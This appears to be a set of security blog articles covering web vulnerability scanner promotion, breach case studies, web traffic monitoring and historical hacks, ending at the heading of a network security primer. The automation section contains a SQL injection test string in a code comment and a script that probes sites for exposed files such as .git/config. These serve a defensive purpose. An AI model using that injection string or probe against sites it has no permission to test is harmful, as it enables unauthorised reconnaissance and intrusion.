As clearly explained in Netsparker Desktop VS Netsparker Cloud both web security solutions are built around the same scanning engine, hence their vulnerability detection capabilities are the same. The main differences between both of them are the other non-scan related features, which also define the scope of the solution.

Figure 1. Netsparker Cloud-based Security Scanner (Click to enlarge)

For example, Netsparker Desktop is ideal for small teams or security professionals who work on their own and have a small to medium workload. On the other hand, Netsparker Cloud is specifically designed for organizations which run and manage a good number of websites and may even have their own team of developers and security professionals. It is a multi-user platform, has a vulnerability tracking solution (a system similar to a normal bug tracking solution but specifically designed for web application vulnerabilities) and is fully scalable, to accommodate the simultaneous scanning of hundreds or thousands of web applications.

Figure 2. Netsparker Desktop-based Security Scanner (Click to enlarge)

Do not just follow the trend – inform yourself. Yes, your reading might be flooded with cloud-related terms, and the industry is pushing you to move your operations to the cloud as it is cheaper and more reliable, but as clearly explained in the desktop vs cloud web scanner comparison, both solutions still have a place in today’s industry.


The Importance of Automating Web Application Security Testing & Penetration Testing

Have you ever tried to make a list of all the attack surfaces you need to secure on your networks and web farms? Try to do it and one thing will stand out: keeping websites and web applications secure. We have firewalls, IDS and IPS systems that inspect every packet that reaches our servers and are able to drop it should it be flagged as malicious, but what about web applications?

Web application security is different from network security. When configuring a firewall you control who accesses what, but when it comes to web application security you have to let everybody in, including the bad guys, and expect that everyone plays by the rules. Hence web applications must be kept secure; web application security should be given much more attention and, considering the complexity of today’s web applications, it should be automated.

Let’s dig deep into this subject and see why it needs to be automated.

Automated Web Security Testing Saves Time

Also known as Penetration Testing or “pen testing”, this is the process by which a security engineer or “pen tester” applies a series of injection or vulnerability tests against areas of a website that accept user input to find potential exploits and alert the website owner before they get taken advantage of and become massive headaches or even financial losses. Common places for this can include user data submission areas such as authentication forms, comments sections, user viewing configuration options (like layout selections), and anywhere else that accepts input from the user. This can also include the URL itself, which may have a Search Engine Optimization-friendly URI formatting system.

Most MVC frameworks or web application suites like WordPress offer this type of URI routing. (We differentiate between a URL and a URI: a URL is the entire address, including the http:// portion, the domain, and everything thereafter, whereas the URI is the portion usually starting after the domain (but sometimes including it, for context), such as /user/view/123 or test.com/articles/123.)

For example, your framework may take a URI style as test.com/system/function/data1/data2/, where system is the controlling system you wish to invoke (such as an articles system), function is the action you wish to invoke (such as read or edit), and the rest are data values, typically in assumed positions (such as year/month/article-title).

Each of these individual values requires a specific data type, such as a string, an integer, a certain regular expression match, or infinite other possibilities. If data types are not strictly enforced, or – sadly, as often as this really does happen – user-submitted data is not properly sanitized, then a hacker can potentially gain information to get further access, if not force direct backdoor access via a SQL injection or a remote file inclusion. Such vulnerabilities are such a prevalent and consistent threat that, for example, SQL injection has featured on the OWASP Top 10 list for over 14 years.
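To make this concrete, here is a minimal Python sketch (the route pattern, table and column names are invented purely for illustration) of the two defences just described: strict data-type enforcement on each URI segment, and a parameterised query so that user-supplied values can never become SQL syntax.

```python
import re
import sqlite3

# Hypothetical route: /articles/view/<year>/<month>/<slug>
URI_PATTERN = re.compile(r"^/articles/view/(\d{4})/(\d{2})/([a-z0-9-]{1,64})$")

def fetch_article(uri, db_path="site.db"):
    match = URI_PATTERN.match(uri)
    if not match:
        # Reject anything that does not fit the expected data types and positions
        raise ValueError("Malformed URI")
    year, month, slug = match.groups()

    conn = sqlite3.connect(db_path)
    try:
        # Parameterised query: user-supplied values are bound, never concatenated into SQL
        cur = conn.execute(
            "SELECT title, body FROM articles WHERE year = ? AND month = ? AND slug = ?",
            (int(year), int(month), slug),
        )
        return cur.fetchone()
    finally:
        conn.close()

# A classic injection attempt such as
#   /articles/view/2014/12/x' OR '1'='1
# is rejected by the regular expression before it ever reaches the database.
```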

There exist potentially millions, billions, or more combinations of various URIs in your web application, including ones it may not support by default or even to your knowledge. There could be random phpinfo(); scripts publicly accessible that were mistakenly left in by a developer, an unchecked user input somewhere, some file upload system that does not properly prevent script execution – any number of possibilities. No security engineer or his team can reasonably account for or test all of these possibilities. And black-hat hackers know all this too, sometimes better than those tasked to protect against these threats.
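This is exactly the kind of drudgery that lends itself to automation. As a purely illustrative sketch (the word list and target URL are hypothetical, and it should only ever be pointed at sites you are authorised to test), a few lines of Python can probe a site for forgotten resources far faster and more consistently than any manual effort:

```python
import requests  # third-party: pip install requests

# A tiny, illustrative word list; real scanners use thousands of entries
COMMON_LEFTOVERS = ["phpinfo.php", "info.php", "test.php", "backup.zip",
                    ".git/config", "phpmyadmin/", "admin/"]

def probe(base_url):
    """Report paths that respond with HTTP 200 on a site we are authorised to test."""
    findings = []
    for path in COMMON_LEFTOVERS:
        url = f"{base_url.rstrip('/')}/{path}"
        try:
            resp = requests.get(url, timeout=5, allow_redirects=False)
        except requests.RequestException:
            continue
        if resp.status_code == 200:
            findings.append(url)
    return findings

if __name__ == "__main__":
    for hit in probe("https://staging.example.com"):
        print("Possible leftover resource:", hit)
```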

Automation Isn’t Just Used By The Good Guys

automation-web-application-security-testing-2
Many automated security tools exist not to test and find security holes, but to exploit them when found. Black-hat hackers intent on disrupting your web application possess automated suites as well, because they, too, know a manual approach is a waste of time (that is, until they find a useful exploit, and by then it’s sometimes too late).

Some utilities, like Slowloris, exist to exploit known weaknesses in common web services, like the Apache web server itself. Others prey on finding opportunity in the form of insecure common web applications – older versions of WordPress, phpBB, phpMyAdmin, cPanel, or other frequently exploited web applications. There exist dozens of categorical vulnerabilities, each with thousands or millions of attack variants. Looking for these is a daunting task.

As quickly as you can spin up a web application, a hacker can automatically scan it and possibly find vulnerabilities. Leveraging an automated web application vulnerability scanner like Netsparker or Netsparker Cloud provides you the agility and proactivity to find and prevent threats before they become seriously damaging problems. This holds especially true for complex web applications such as large forum systems, blogging platforms and custom web applications. The more possibility for user submitted data and functionality, the more opportunity for vulnerabilities to exist and be exploited. And remember, this changes again for every new version of the web application you install. A daunting task, indeed.

Without automation of web application security testing, a truly strong security posture is impossible to achieve. Of course, many other layers ultimately exist – least-privilege practice, segregated (jail, chroot, virtual machine) systems, firewalls, etc. – but if the front door is not secure, what does it matter if the walls are impenetrable? With the speed afforded by automation, a strong and capable web vulnerability scanner, and of course patching found flaws and risks, security testing guarantees as best as reasonably possible that the front door to your web application and underlying infrastructure remains reinforced and secure.

  • Hits: 17566

Statistics Highlight the State of Security of Web Applications - Many Still Vulnerable to Hacker Attacks

state-of-security-of-web-applications-1
Netsparker use open source web applications such as Twiki for a totally different purpose than the one they were intended for: they use them to test their own web application security scanners.

Netsparker need to ensure that their scanners are able to crawl and identify attack surfaces on all sorts of web applications, and to identify as many vulnerabilities as possible. Hence they frequently scan open source web applications, using them as a test bed for their crawling and scanning engine.

Thanks to this exercise, Netsparker are also helping developers ship more secure code, since they report their findings to the developers and sometimes also help them remediate the issues. When such web application vulnerabilities are identified, Netsparker release an advisory; between 2011 and 2014 Netsparker published 87 advisories.

state-of-security-of-web-applications-2

A few days ago Netsparker released some statistics about the 87 advisories they have published so far. As a quick overview, these statistics show that cross-site scripting is the most common vulnerability in the open source web applications that were scanned. Is it a coincidence? Not really.

The article also explains why so many web applications are most probably vulnerable to this flaw, which has featured on the OWASP Top 10 list ever since the list was first published.

The conclusion we can draw from these statistics is quite predictable, but at the same time shocking: there is still a very long way to go in web application security, i.e. web applications are still poorly coded, making them an easy target for malicious hacker attacks.

  • Hits: 14777

The Implications of Unsecure Webservers & Websites for Organizations & Businesses

implications-of-unsecure-webservers-websites-1
Long gone are the days when a simple port scan on a company’s webserver or website was considered enough to identify security issues and exploits that needed to be patched. With all the recent attacks on websites and webservers, which caused millions of dollars in damage, we thought it would be a great idea to analyze the implications vulnerable webservers and websites have for companies, while providing useful information to help IT departments, security engineers and application developers proactively avoid unwanted situations.

Unfortunately, companies and webmasters often turn their attention to their webservers and websites only after the damage is done, at which point the cost is always greater than that of any proactive measures that could have been taken to avoid the situation.

Most Security Breaches Could Have Been Easily Prevented

Without doubt, corporate websites and webservers are amongst the most preferred targets for hackers. Exploiting well-known vulnerabilities provides them with easy access to databases that contain sensitive information such as usernames, passwords, email addresses, credit & debit card numbers, social security numbers and much more.

The sad part of this story is that in most cases, hackers made use of old exploits and vulnerabilities to scan their targets and eventually gain unauthorized access to their systems.

Most security experts agree that if companies proactively scanned and tested their systems using well-known web application security scanner tools, e.g. Netsparker, these security breaches could have been easily avoided. The Online Trust Alliance (OTA) confirms this: it analyzed thousands of security breaches that occurred in the first half of 2014 and concluded that they could have been easily prevented. [Source: OTA Website]

Tools such as Web Application Vulnerability Scanners are used by security professionals to automatically scan websites and web applications for hidden vulnerabilities.

When reading through recent security breaches, we slowly begin to understand the implications and disastrous effects these had for companies and customers. Quite often, the number of affected users whose information was compromised was in the millions. We should also keep in mind that in many cases, the true magnitude of such a security incident is very rarely made known to the public.

Below are a few of the biggest security data breaches which exposed an unbelievable amount of information to hackers:

 eBay.com – 145 Million Compromised Accounts

implications-of-unsecure-webservers-websites-2
In late February – early March 2014, the eBay database that held customer names, encrypted passwords, email addresses, physical addresses, phone numbers, dates of birth and other personal information was compromised, exposing sensitive information to hackers. [Source: bgr.com website]

JPMorgan Chase Bank – 76 Million Household Accounts & 7 Million Small Business

implications-of-unsecure-webservers-websites-3
In June 2014, JPMorgan Chase bank was hit badly and had sensitive personal and financial data exposed for over 80 million accounts. The hackers appear to have obtained a list of the applications and programs that run on the company’s computers and then cross-checked them against known vulnerabilities for each program and web application in order to find an entry point back into the bank’s systems.
[Source: nytimes.com website]

Find security holes on your websites and fix them before they do by scanning your websites and web applications with a Web Application Security Scanner.

Forbes.com – 1 Million User Accounts

implications-of-unsecure-webservers-websites-4
In February 2014, the Forbes.com website succumbed to an attack that leaked over 1 million user accounts containing email addresses, passwords and more. The Forbes.com WordPress-based backend site was defaced with a number of news posts. [Source: cnet.com website]

Snapchat.com – 4.6 Million Username Accounts & Phone numbers

implications-of-unsecure-webservers-websites-5
In January 2014, Snapchat’s popular website had over 4.6 million usernames and phone numbers exposed due to a brute-force enumeration attack against the Snapchat API. The information was publicly posted on several other sites, creating a major security concern for Snapchat and its users.
[Source: cnbc.com website]

USA Businesses: Nasdaq, 7-Eleven and others – 160 Million Credit & Debit Cards

implications-of-unsecure-webservers-websites-6
In 2013 a massive underground attack was uncovered, revealing that over 160 million credit and debit cards had been stolen during the previous seven years. Five Russians and Ukrainians used advanced hacking techniques to steal the information during these years. Attackers targeted over 800,000 bank accounts and penetrated servers used by the Nasdaq stock exchange.
[Source: nydailynews.com website]

AT&T - 114,000 iPad Owners (Includes White House Officers, US Senate & Military Officials)

implications-of-unsecure-webservers-websites-7
In 2010, a major security breach on AT&T’s website compromised over 114,000 customer accounts, revealing names, email addresses and other information. AT&T acknowledged the attack on its webservers and commented that the risk was limited to the subscribers’ email addresses.
Amongst the list were apparently officers from the White House, members of the US Senate, and staff from NASA, the New York Times, Viacom and Time Warner, as well as bankers and many more. [Source: theguardian.com website]

Target  - 98 Million Credit & Debit Cards Stolen

implications-of-unsecure-webservers-websites-8
In 2013, between the 27th of November and the 15th of December, more than 98 million credit and debit card accounts were stolen from 1,787 Target stores across the United States. Hackers managed to install malware on Target’s computer systems to capture customers’ card details and then installed exfiltration malware to move stolen credit card numbers to staging points around the United States in order to cover their tracks. The information was then moved to the hackers’ computers located in Russia.

The odd part of this security breach is that the infiltration was caught by FireEye – the $1.6 million malware detection tool purchased by Target. However, according to online sources, when the alarm was raised with the security team in Minneapolis, no action was taken, and 40 million credit card numbers and 70 million addresses, phone numbers and other records were pulled out of Target’s mainframes! [Source: Bloomberg website]

SQL Injection & Cross-Site Scripting are among the most popular attack methods used against websites and web applications. Security tools such as Web Vulnerability Scanners allow us to uncover these vulnerabilities and fix them before hackers exploit them.

Implications for Organizations & Businesses

It goes without saying that organizations suffer major damage and losses when it comes to security breaches. When a security breach affects millions of users, as in the examples above, it’s almost impossible to calculate an exact dollar ($) figure.

Security Experts agree that data security breaches are among the biggest challenges organizations face today as the problem has both financial and legal implications.

Business Loss is the biggest contributor to overall data breach costs and this is because it breaks down to a number of other sub-categories, of which the most important are outlined below:

  • Detection of the data breach. Depending on the type of security breach, the business can lose substantial amounts of money until the breach is successfully detected. Common examples are a defaced website, customer orders and credit card information being redirected to hackers, and orders being manipulated or declined.
  • Escalation Costs. Once the security breach has been identified, emergency security measures are usually put into action. This typically involves bringing in Internet security specialists, the cybercrime unit (police) and other forces, to help identify the source of the attack and damage it has caused. Data backups are checked for their integrity and everyone is on high-alert.
  • Notification Costs. Customers and users must be notified as soon as possible. Email alerts, phone calls and other means are used to get in contact with the customers and request them to change passwords, details and other sensitive information. The company might also need to put together a special team that will track and monitor customer responses and reactions.
  • Customer Attrition. Also known as customer defection. After a serious incident involving sensitive customer data being exposed, customers are more likely to stop purchasing and using the company’s services. Gaining initially a customer’s trust requires sacrifices and hard work – trying to re-gain it after such an incident means even more sacrifices and significantly greater costs. In many cases, customers choose to not deal with the company ever again, costing it thousands or millions of dollars.
  • Legal Implications. In many cases, customers have turned against companies after their personal information was exposed by a security breach. Legal action against companies is usually followed by lengthy lawsuits which end up costing thousands of dollars, not to mention any financial compensation awarded to the affected customers. One example is Target’s security breach, mentioned previously, which is now the subject of multiple lawsuits from customers.

As outlined previously, the risk for organizations is high and there is a lot at stake from both a financial and a legal perspective. The security breach examples mentioned in this article illustrate how big and serious a security breach can become, as well as the implications for companies and customers. Our next article will focus on guidelines that can help prevent data breaches and help our organization, company or business deal with them.

  • Hits: 30066

The Importance of Monitoring and Controlling Web Traffic in Enterprise & SMB Networks - Protecting from Malicious Websites - Part 1

security-protect-enterprise-smb-network-web-monitoring-p1-1
This article expands on our popular security articles (Part 1 & Part 2) that covered the importance of patching enterprise and SMB network systems to protect them from hijacking, hacking attempts, unauthorized access to sensitive data and more. While patching systems is essential, another equally important step is the monitoring of web traffic, to control user activity on the web and prevent users from accessing dangerous sites and Internet resources that could jeopardize the company’s security.

The ancient maxim – prevention is better than cure – holds true in cyberspace as well, and it is prudent to detect beforehand signs of trouble which, if allowed to continue, might snowball into something uncontrollable. One of the best means of such prevention is monitoring web traffic to locate potential sources of trouble.

Even if attackers are unable to gain access to your network, they can still hold you to ransom by launching a Distributed Denial of Service (DDoS) attack, in which they choke the bandwidth of your network. Regular customers will not be able to gain access to your servers, and these days downtime for any company translates to loss of income and damage to the company’s reputation. Attackers might also refuse to relent until a ransom is paid. Sounds a bit too far-fetched? Not really.

Live Attacks & Hacking Attempts On The Internet

It’s hard to imagine what is really happening right now on the Internet: how many attacks are taking place, the magnitude of these attacks, the services used to launch attacks, attack origins, attack targets and much more. Hopefully we’ll be able to help change that for you right now…

The screenshot below was taken after monitoring the Norse network which collects and analyzes live threat intelligence from darknets in hundreds of locations in over 40 countries. The attacks are taken from a small subset of live flows against the Norse honeypot infrastructure and represent actual worldwide cyber-attacks:

security-protect-enterprise-smb-network-web-monitoring-p1-2a

In around 15 minutes of monitoring, we saw more than 5000 different origins launching attacks against over 5800 targets; 99% of the targets were located in the United States and 50% of the attack origins were in China.

The sad truth is that the majority of these attacks are initiated from compromised computer systems and servers with unrestricted web access. All it takes today is for one system to visit an infected site, and that could be enough to bring down the whole enterprise network infrastructure while at the same time launching a massive attack against Internet targets.

security-protect-enterprise-smb-network-web-monitoring-p1-3
In June 2014, Evernote and Feedly, two services that work largely in tandem, went down under DDoS attacks within two days of each other. Evernote recovered the same day, but Feedly suffered more: there were two further DDoS attacks on Feedly that caused it to lose business for another two days before normalcy was finally restored. According to the CEO of Feedly, they refused to give in to the ransom demands made in exchange for ending the attack and were successful in neutralizing the threat.

security-protect-enterprise-smb-network-web-monitoring-p1-4
Domino's Pizza had over 600,000 Belgian and French customer records stolen by the hacking group Rex Mundi. The attackers demanded $40,000 from the fast food chain in exchange for not publishing the data online. It is not clear whether Domino's complied with the ransom demands; however, they reassured their customers that although the attackers did have their names, addresses and phone numbers, they were unsuccessful in stealing financial and banking information. The Twitter account of the hacking group was suspended, and they never released the information.

Apart from external attacks, misbehavior by employees can cause equal if not greater damage. Employees viewing pornographic material in the workplace can lead to a huge number of issues. Not only is porn one of the biggest time wasters, it chokes up the network bandwidth with non-productive downloads and brings in unwanted viruses, malware and Trojans. Co-workers unwillingly exposed to offensive images can find the workplace uncomfortable, and this may further lead to charges of sexual harassment, dismissals and lawsuits, all expensive and disruptive.

Another major problem is data leakage via e-mail or webmail, whether intended or by accident. Client data, unreleased financial data and confidential plans leaked through emails may have a devastating impact on the business, including loss of client confidence.

Web monitoring provides answers to several of these problems. This type of monitoring need not be very intrusive or onerous, but with the right policies and training, employees easily learn to differentiate between appropriate and inappropriate use.

Few Of The Biggest Web Problems

To monitor the web, you must know the issues that you need to focus on. Although organizations differ in their values, policies and culture, there are some common major issues on the Web that cause the biggest headaches:

  • Torrents And Peer-To-Peer Networks offer free software, chat, music and video, which can be easily downloaded. However, this can hog the bandwidth, causing disruptions to operations such as video conferencing and VoIP. Moreover, such sites also contain pirated software, bootlegged movies and inappropriate content that are mostly tainted with various types of viruses and Trojans.
  • Gaming sites are notorious for hogging bandwidth and wasting productive time. Employees often find these sites hard to resist and download games. Most of the games carry lethal payloads of viruses and other malware, and hackers find them a common vehicle for SEO poisoning. Even when safe, games disrupt productivity and clog the network.
  • Fun sites, although providing a harmless means of relieving stress, may be offensive and inappropriate to coworkers. Whether or not your policies allow such humor sites, they can contain SEO-poisoned links and Trojans, and often clog networks with their video components.
  • Online Shopping may relate to purchase of work-appropriate items as well as personal. Although the actual purchase may not take up much time, surfing for the right product is a huge time waster, especially for personal items. Individual policies may either limit the access to certain hours of the day or block these sites altogether.
  • Non-Productive Surfing can be a huge productivity killer for any organization. Employees may be obsessed with tracking shares, sports news or deals on commercial sites such as Craigslist and eBay. Company policies can block access to such sites entirely, or limit the time spent on such sites to only during lunchtime.

In a survey of over 3,000 employees, Salary.com found that more than 60% visited sites unrelated to their work every day. More than 20% spent over five hours a week on non-work-related sites. Nearly half of those surveyed looked for a new job using office computers during work time.

In the next part of our article, we will examine the importance of putting a company security policy in place to help stop users visiting sites they shouldn't and wasting valuable time and resources on activities that can compromise the enterprise's network security. We also take an in-depth look at how to effectively monitor and control traffic activity on the web in real time, plus much more.

 

  • Hits: 16744

The Most Dangerous Websites On The Internet & How To Effectively Protect Your Enterprise From Them

whitepaper-malicious-website-content
Companies and users around the world are struggling to keep their network environments safe from malicious attacks and hijacking attempts by leveraging services provided by high-end firewalls, Intrusion Detection Systems (IDS), antivirus software and other means. While these appliances can mitigate attacks and hacking attempts, we often see the whole security infrastructure fail because of attacks initiated from the inside, effectively bypassing all the protection offered by these systems.

I’m sure most readers will agree when I say that end-users are usually responsible for attacks that originate from the internal network infrastructure. A frequent example: when users find a link while browsing the Internet, they tend to click on it to see where it goes, even if the context suggests that the link may be malicious. Users are unaware of the hidden dangers and the potential damage that can be caused by clicking on such links.

The implications of following links with malicious content can vary for each company, however, we outline a few common cases often seen or read about:

  • Hijacking of the company’s VoIP system, generating huge bills from calls made to overseas destination numbers (toll fraud)
  • The company’s servers are overloaded by thousands of requests made from the infected workstation(s)
  • Sensitive information is pulled from the workstations and sent to the hackers
  • Company Email servers are used to generate and send millions of spam emails, eventually placing them on a blacklist and causing massive communication disruptions
  • Remote control software is installed on the workstations, allowing hackers to see everything the user is doing on their desktop
  • Torrents are downloaded and seeded directly from the company’s Internet lines, causing major WAN disruptions and delays

As you can see there are countless examples we can analyze to help us understand how serious the problem can become.

Download this whitepaper if you are interested to:

  • Learn which are the Top 10 Dangerous sites users visit
  • Learn the Pros and Cons of each website category
  • Understand why web content filtering is important
  • Learn how to effectively block sites from compromising your network
  • Learn how to limit the amount of the time users can access websites
  • Effectively protect your network from end-user ‘mistakes’
  • Ensure user web-browsing does not abuse your Internet line or Email servers

We apologise; however, the whitepaper is no longer available from the vendor. Head to our homepage to read up on new network and security related articles.

 


  • Hits: 23866

Download Your Free Whitepaper: How to Secure your Network from Cyber Attacks

whitepaper-fight-cybercrime-module
Cybercriminals are now focusing their attention on small and mid-sized businesses because they are typically easier targets than large, multinational corporations.
This white paper examines the rising security threats that put small and medium businesses at risk. It also highlights important security considerations that SMBs should be aware of.

Download this whitepaper if you’re interested to:

  • Learn how to adopt best practices and boost your business security.
  • Evaluate the SMB digital footprint.
  • Know what to look for in new security solutions.

We apologise; however, the whitepaper is no longer available from the vendor. Head to our homepage to read up on new network and security related articles.

  • Hits: 17050

A Networked World: New IT Security Challenges

network-security-1
This is the age of networks. Long ago, they said, ‘the mainframe is the computer’. Then it changed to ‘the PC is the computer’. That was followed by ‘the network is the computer’. Our world has been shrunk, enlightened and sped up by this globe-encapsulating mesh of interconnectivity. Isolation is a thing of the past. Now my phone brings up my entire music collection residing on my home computer. My car navigates around the city, avoiding traffic in real time. We have started living in intelligent homes where we can control objects within them remotely.

On a larger scale, our road traffic system, security CCTV, air traffic control, power stations, nuclear power plants, financial institutions and even certain military assets are administered using networks. We are all part of this great cyber space. But how safe are we? What is our current level of vulnerability?

Tower, Am I Cleared For Landing?

March 10, 1997: It was a routine day of activity at Air Traffic Control (ATC) at Worcester, Massachusetts, with flight activity at its peak. Suddenly the ground-to-air communications system went down, meaning that ATC could not communicate with approaching aircraft trying to land. This was a serious threat to all aircraft and passengers using that airport, and all incoming flights had to be diverted to another airport to avoid a disaster.

This mayhem was caused by a 17-year-old hacker named Jester. He had physically tapped into a normal telephone line, giving him complete control of the airport’s entire communications system. His intrusion was via a telephone junction box, which in turn was part of a high-end fibre backbone. He was caught when, directed by the United States Secret Service, the telephone company traced the data streams back to the hacker’s parents’ house. Jester was the first juvenile to be charged under the Computer Crimes Law.

As our world becomes more and more computerised and our computer systems start interconnecting, the level of vulnerability goes up. But should this mean an end to all advancement in our lives? No. We need to make sure we are safe and the things that make our lives easier and safer are also secure.

Intruder Alert

network-security-2
April 1994: A US Air Force base realised that its high-level security network had not just been hacked – secure documents had been stolen. This resulted in an internal cyber manhunt. Bait was laid and all further intrusions were monitored. A team of 50 federal agents finally tracked down two hackers who had been using US-based social networking systems to hack into the Air Force base. But it was later revealed that the scope of the intrusion was not limited to the base itself: they had infiltrated a much bigger military organisation. The perpetrators were hackers with the aliases ‘datastreamcowboy’ and ‘kuji’.

‘Datastreamcowboy’ was a 16-year-old British national who was apprehended on May 4th, 1994, and ‘kuji’ was a 21-year-old technician named Mathew Bevan from Cardiff, Wales. ‘Datastreamcowboy’ was like an apprentice to ‘kuji’: he would try a method of intrusion and, if he failed, he would go back to ‘kuji’ for guidance. ‘Kuji’ would mentor him to the point that on subsequent attempts ‘datastreamcowboy’ would succeed.

What was their motive? Bragging rights in the world of hacking for being able to penetrate the security of the holy grail of all hackers: the Pentagon.

But the future might not see such benign motives at play. As command and control of military installations is becoming computerised and networked, it has become imperative to safeguard against intruders who might break into an armoury with the purpose of causing damage to it or to control and use it with malice.

Social Virus

October 2005: The social networking site MySpace was crippled by a highly infectious computer virus. The virus took control of millions of online MySpace profiles and broadcast the hacker’s messages. The modus operandi of the hacker was to place a virus on his own profile: whenever someone visited his profile page, they would be infected and their profile would display the hacker’s message. The newly infected users would then spread the infection through their friends on MySpace, creating a massive chain reaction within the social network community. The mass infection caused the entire MySpace social network to grind to a halt.

The creator of this mayhem was Samy Kamkar, a 19-year-old. His attack was not very well organised, however: he left digital footprints and was later caught. Banned from using a computer for 3 years, he later became a security consultant helping companies and institutions safeguard themselves against attacks.

What that showed the world was the fact that a cyber attack could come from anywhere, anytime.

In our current digital world we already know that a lot of our complex systems like Air Traffic Control, power stations, dams, etc are controlled and monitored using computers and networks. Let’s try to understand the technology behind it to gauge where the security vulnerabilities come from.

SCADA: Observer & Controller

Over the last few decades, SCADA technology has enabled us to have greater control over predominantly mechanical systems which were, by design, very isolated. But what is SCADA? What does it stand for?

SCADA is an acronym for Supervisory Control And Data Acquisition. A quick search on the internet and you would find the definition to be as follows:

SCADA (supervisory control and data acquisition) is a type of industrial control system (ICS). Industrial control systems are computer controlled systems that monitor and control industrial processes that exist in the physical world. SCADA systems historically distinguish themselves from other ICS systems by being large scale processes that can include multiple sites and large distances. These processes include industrial, infrastructure, and facility-based processes as described below:

  • Industrial processes include those of manufacturing, production, power generation, fabrication and refining, and may run in continuous, batch, repetitive, or discrete modes.
  • Infrastructure processes may be public or private and include water treatment and distribution, wastewater collection and treatment, oil and gas pipelines, electrical power transmission and distribution, wind farms, civil defence siren systems and large communication systems.
  • Facility processes occur both in public facilities and private ones, including buildings, airports, ships, and space stations. They monitor and control heating, ventilation and air conditioning systems (HVAC), access and energy consumption.

This effectively lets us control the landing lights on a runway, the gates of a reservoir or dam, or the connection and disconnection of power grids to a city supply.

Over the last decade all such systems have become connected to the Internet. However, when SCADA was being developed, no thought was given to security: no one imagined that a SCADA-based system would end up on the Internet. Functionality and convenience were given higher priority and security was ignored, hence SCADA carries the burden of inherent security flaws.

Tests have been performed extensively to map the vulnerabilities of networked SCADA systems. One test was performed on a federal prison which used SCADA to control gates and security infrastructure. Within two weeks, a test hacker had full control of all the cell doors. The kit the hacker used was purchased on the open market for as little as $2,500.

But, thankfully, more and more thought is given today when designing a SCADA based system which will be used over a network. Strict security policies and intrusion detection and avoidance technologies are implemented.

Where’s My Money?

The years 1994–1995 saw a momentous change in our financial industry: the entire financial sector went online. Paper transactions were a thing of the past. Vast sums of money now change location in a matter of milliseconds. The share markets, along with complex monetary assets, now trade using the same cyberspace which we use for social networking, shopping and so on. As this involved money being transferred in unimaginable amounts, the financial industry, especially banks, went to great lengths to protect themselves.

As happens in the physical world, where thieves adapt to better locks, hackers have changed their ways as well. They have developed tools that can bypass encryption to steal funds, or even hold an entire institution to ransom. The average annual loss due to cyber heists has been estimated at nearly 1.3 million dollars; since banks hardly hold any cash in their branches, an ordinary bank robbery would hardly net more than $6,000–$8,000 in hard cash.

Cyber heists are a criminal industry with staggering rewards, the magnitude of which runs into hundreds of billions of dollars. But most cyber intrusions in this industry go unreported because of their long-term impact on the compromised institution’s reputation and credibility.

Your Card Is Now My Card!

network-security-credit-card-hacked
2005: Miami, Florida. A Miami hacker made history in cyber theft. Alberto Gonzales would drive around Miami streets looking for unsecured wireless networks. He hooked onto the unsecured wireless network of a retailer, used it to reach the retailer’s headquarters and stole credit card numbers from its databases. He then sold these card details to Eastern European cyber criminals. In the first year, he stole 11.2 million card details; by the end of the second year he had stolen about 90 million.

He was arrested in July 2007 while trying to use one of these stolen cards. On subsequent interrogation it was revealed that he had stored away 43 million credit card details on servers in Latvia and Ukraine.

In recent times we know a certain gaming console organisation had its online gaming network hacked and customer details stolen. For that organisation, the security measures taken subsequent to that intrusion were ‘too little too late’, but all such companies that hold customer credit card details consequently improved their network security setup.

Meltdown By Swatting

January 2005: A hacker with the alias ‘dshocker’ was carrying out all-out attacks on several big corporations in the US. He used stolen credit cards to fund his hacking activities. He managed to break through a firewall and infect large numbers of computers, which enabled him to take control of all of those machines and use their collective computing power to carry out a Denial of Service attack on the corporation itself. The entire network went into meltdown. Then he did something that is known today as ‘swatting’. Swatting is an action that dupes the emergency services into sending out an emergency response team. These false alarms and follow-up raids end up costing the civic authorities vast sums of money and resources.

He was finally arrested when his fraudulent credit card activities caught up with him.

Playing Safe In Today’s World

Today technology is a great equaliser. It has given the sort of power to individuals that only nations could boast of in the past. All the network intrusions and their subsequent effects can be used individually or together to bring a nation to its knees. The attackers can hide behind the cyber world and their attacks can strike anyone without warning. So what we need to do is to stay a step ahead.

We can’t abolish using the network, the cloud or the things that have given us more productivity and efficiency. We need to envelop ourselves with stricter security measures to ensure that all that belongs to us is safe, and amenities used by us everyday are not turned against us. This goes for everyone, big organisations and the individual using his home network.

At home, keep your wireless internet connection locked down with a proper password. Do not leave any default passwords unchanged. That is a security flaw that can be taken advantage of. On your PCs and desktops, every operating system comes with its own firewall. Keep it on. Turning it off for convenience will cost you more than keeping it on and allowing only certain applications to communicate safely with the internet. In your emails, if you don’t recognise a sender’s email, do not respond or click on any of the links it may carry. These can be viruses ready to attack your machines and create a security hole through which the hacker will enter your home network. And for cyber’s sake, please, you haven’t won a lottery or inherited millions from a dead relative. So all those emails telling you so are just fakes. They are only worth deleting.

The simple exercise of keeping your pop-up blocker turned on will keep your surfing through your browser a lot safer. Your operating system, mainly Windows and Linux, lets you keep a guest account so whenever a ‘guest’ wants to check his/her emails or surf the web have them use this account instead of your own. Not that you don’t trust your guest but they might innocently click on something while surfing and not know what cyber nastiness they have invited into your machine. The guest account has  minimal privileges for users so it can be safe. Also, all accounts must have proper passwords. Don’t let your machine boot up to an administrator account with no password set. That is a recipe for disaster. Don’t use a café’s wireless network to check your bank balance. That can wait till you reach home. Or just call the bank up. That’s safer.

At work, please don’t plug an unauthorised wireless access point into your corporate network; this can severely compromise it. Use strong passwords for accounts and remove old accounts that are no longer used. Incorporate strong firewall rules and demarcate an effective DMZ so that you stay safer. Stop trying to find a way to jump over a proxy or disable it: you are using company time for a purpose that can’t be work related. If access is genuinely needed, ask the network administrator for assistance.

I am not an alarmist, nor do I believe in sensationalism. I believe in staying safe so that I can enjoy the fruits of technology. And so should you, because you deserve it.

Readers can also visit our Network Security section, which offers a number of interesting articles covering network security.

About the Writer

Arani Mukherjee holds a Master’s degree in Distributed Computing Systems from the University of Greenwich, UK, and works as a network designer and innovator for remote management systems for a major telecoms company in the UK. He is an avid reader of anything related to networking and computing. Arani is a highly valued and respected member of Firewall.cx, offering knowledge and expertise to the global community since 2005.

 

  • Hits: 16016

Introduction To Network Security - Part 2

This article builds upon our first article Introduction to Network Security - Part 1. This article is split into 5 pages and covers a variety of topics including:

  • Tools an Attacker Uses
  • General Network Tools
  • Exploits
  • Port Scanners
  • Network Sniffers
  • Vulnerability Scanners
  • Password Crackers
  • What is Penetration Testing
  • More Tools
  • Common Exploits
  • A Brief Walk-through of an Attack
  • and more.

Tools An Attacker Uses

